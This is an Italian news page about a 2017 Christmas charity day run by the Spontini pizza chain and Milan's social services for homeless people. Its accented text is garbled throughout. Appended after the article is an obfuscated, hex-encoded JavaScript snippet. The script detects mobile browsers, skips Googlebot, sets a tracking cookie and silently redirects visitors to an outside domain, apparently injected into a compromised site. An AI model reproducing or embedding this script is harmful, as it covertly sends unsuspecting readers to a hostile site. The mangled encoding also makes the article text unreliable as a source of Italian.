News

Il 17 dicembre una domenica di solidarietA� da parte di Spontini e Comune di Milano

IlA� 4 dicembre 2017 a Palazzo Marino di Milano A? stata presentata la giornata si solidarietA� in occasione del Natale sponsorizzara da Pizzerie Spontini e Comune di Milano.

Affiancare la crescita aziendale ad attivitA� di condivisione e solidarietA� A? possibile e deve essere fatto. A? questo il principio sul quale si fonda la filosofia di SpontiniA�A�che dopo la��iniziativa natalizia del tram di luci e, lo scorso anno, del flashmob col coro gospel, continua ad interpretare le festivitA� di Natale come una occasione per stare vicino alla cittA� di Milano e ringraziare i suoi abitanti per la��affetto che da sempre dimostranoA�all’azienda. Protagonisti della��iniziativa di questa��anno, il 17 dicembre, sono gli ospiti dei centri di accoglienza del Comune di Milano che, attraverso la��Assessorato alle Politiche Sociali, A? parte attiva nella realizzazione del progetto.

“Ringraziamo Spontini per questo gesto di solidarietA� e vicinanza ai senza dimora della cittA�. Con questa storica catena della ristorazione milanese abbiamo avviato negli ultimi anni una collaborazione proficua che tramite la��utilizzo delle borse lavoro del Comune ha permesso la��inserimento nei loro negozi di molti giovani in difficoltA� avviandoli ad una prima attivitA�. Questa collaborazione continuerA� anche nel nuovo anno consolidando un rapporto tra pubblico e privato che ha dato finora grandi risultati” A? il commento di Pierfrancesco Majorino, assessore alle Politiche sociali del Comune di Milano.

“Sono molto felice di presentare la prima edizione del progetto ‘Il Natale di SpontiniA� A? anche una occasione di solidarietA�’, una grande festa per le persone piA? fragili, organizzata in collaborazione col Comune di Milano. Il capoluogo lombardo A? una grande cittA�, aperta e generosa e SpontiniA� A? espressione di questa realtA� che interpreta cercando di restituire parte della fortuna e della��affetto che le A? stato dato. Natale diventa per noi un momento di condivisione con quello che sappiamo fare meglio, la nostra pizza e la nostra compagnia per far sA� che Natale sia un momento di gioia e speranza per tutti. Speriamo, inoltre, che questo evento possa aprire un nuovo ciclo e diventare un appuntamento annuale fisso per la cittA�.a�? spiega Massimo Innocenti, Executive CEO di Spontini Holding.

Programma della giornata
a�?Il Natale di SpontiniA�a�? A? un evento rivolto agli ospiti delle Onlus attive sul territorio di Milano tra cui Associazione City Angels Lombardia Onlus, Fondazione Progetto Arca, Fondazione Fratelli di San Francesco d’Assisi, REMAR Italia Onlus, che domenica 17 dicembre potranno consumare un pasto caldo e una bibita consegnata presso i loro centri, in particolare quelli situati intorno alla Stazione Centrale.

Per offrire la stessa possibilitA� anche ai senza fissa dimora che non vivono in una struttura, ma solitamente si fermano di giorno nella��area della Stazione Centrale, una tendostruttura A? stataA�appositamente costruita in Piazza Duca Da��Aosta.

La struttura, riscaldata, avrA� una ampiezza di 100 metri quadrati e una capienza di 80 posti a sedere. La pizza verrA� fornita dal punto vendita SpontiniA� attiguo alla piazza, quello di Piazza Duca Da��Aosta.
La giornata si aprirA� alle ore 11:00 con un incontro con la stampa e un concerto gospel rivolto a tutta la cittadinanza.

SpontiniA� Impegno Etico
SpontiniA� A? attivo sul territorio con attivitA� di Impegno Etico volte ad aiutare chi A? meno fortunato, a dare la possibilitA� di un lavoro a chi ne ha bisogno, a rendere la cittA� ancora piA? bella. Dal 2013 A? vicino alla��Associazione CAF, storica realtA� milanese di aiuto alle famiglie in difficoltA� che accoglie nelle sue strutture minori vittime di abusi. Dal 2016 SpontiniA� ha inoltre iniziato una collaborazione col CELAV, il servizio del Settore Servizi Sociali per Adulti in DifficoltA� del Comune di Milano che favorisce la��integrazione lavorativa di soggetti in condizione di svantaggio e disagio personale, familiare o sociale che hanno difficoltA� ad inserirsi nel circuito produttivo autonomamente. Inoltre, da quattro anni SpontiniA� collabora con il Comune di Milano per la manutenzione di aree verdi pubbliche della cittA� vicine alle proprie pizzerie.

SpontiniA� – Nata a Milano nel 1953 da una bottega dava ristoro ai milanesi nel boom economico del dopoguerra, SpontiniA� A?A�oggi una realtA�A�imprenditoriale internazionale che segue il ritmo cittadino: una pizza al trancio veloce, gustosa e di qualitA�. La famiglia Innocenti, alla guida della��azienda dal 1977, A? proprietaria del marchio SpontiniA� e con Spontini Holding gestisce lo sviluppo nazionale ed internazionale. (pizzeriaspontini.it)

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}